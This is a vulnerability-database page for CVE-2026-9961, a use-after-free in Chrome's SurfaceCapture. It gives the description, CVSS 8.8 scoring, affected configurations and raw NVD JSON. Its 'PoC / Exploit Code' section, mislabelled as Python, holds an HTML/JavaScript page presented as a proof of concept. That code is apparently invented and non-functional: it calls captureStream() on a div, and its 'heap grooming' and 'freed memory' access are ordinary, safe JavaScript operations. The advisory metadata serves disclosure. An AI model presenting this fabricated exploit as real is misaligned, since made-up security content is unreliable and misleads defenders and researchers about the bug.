Security Vulnerability Report
中文
CVE-2026-9961 CVSS 8.8 HIGH

CVE-2026-9961

Published: 2026-05-28 23:16:54
Last Modified: 2026-05-29 20:35:20

Description

Use after free in SurfaceCapture in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 148.0.7778.216

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- This is a conceptual Proof of Concept (PoC) for the Use-After-Free vulnerability in Chrome SurfaceCapture. Actual exploitation requires precise memory layout control and specific heap grooming. --> <!DOCTYPE html> <html> <head> <title>CVE-2026-9961 PoC</title> <script> function trigger_uaf() { // Step 1: Create the vulnerable object (Simulated SurfaceCapture context) let vulnerable_obj = document.createElement('div'); // Setup capture logic (conceptual) vulnerable_obj.captureStream(); // Step 2: Force the object to be freed // Removing the element from DOM might trigger garbage collection or specific cleanup vulnerable_obj.remove(); // Step 3: Heap grooming / Allocation to reclaim the freed memory // Allocate a buffer of similar size to occupy the freed memory let spray_buffer = new Array(100).fill(0x41414141); // Step 4: Access the freed object (Use-After-Free) // This attempts to access the memory of vulnerable_obj, which is now controlled by spray_buffer try { console.log(vulnerable_obj.innerHTML); // Accessing freed memory } catch (e) { console.log("Exception triggered: " + e); } } window.onload = function() { trigger_uaf(); } </script> </head> <body> <h1>CVE-2026-9961 Test Page</h1> <p>Check console for crash or behavior.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9961", "sourceIdentifier": "[email protected]", "published": "2026-05-28T23:16:54.320", "lastModified": "2026-05-29T20:35:20.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in SurfaceCapture in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "148.0.7778.215", "matchCriteriaId": "875ACED4-0D6D-4BAA-8FAF-F13B5FEDF09A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "148.0.7778.216", "matchCriteriaId": "E59192D9-BF13-4B43-B69F-869A6BF83955"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://issues.chromium.org/issues/504710769", "source": "[email protected]", "tags": ["Permissions Required"]}]}}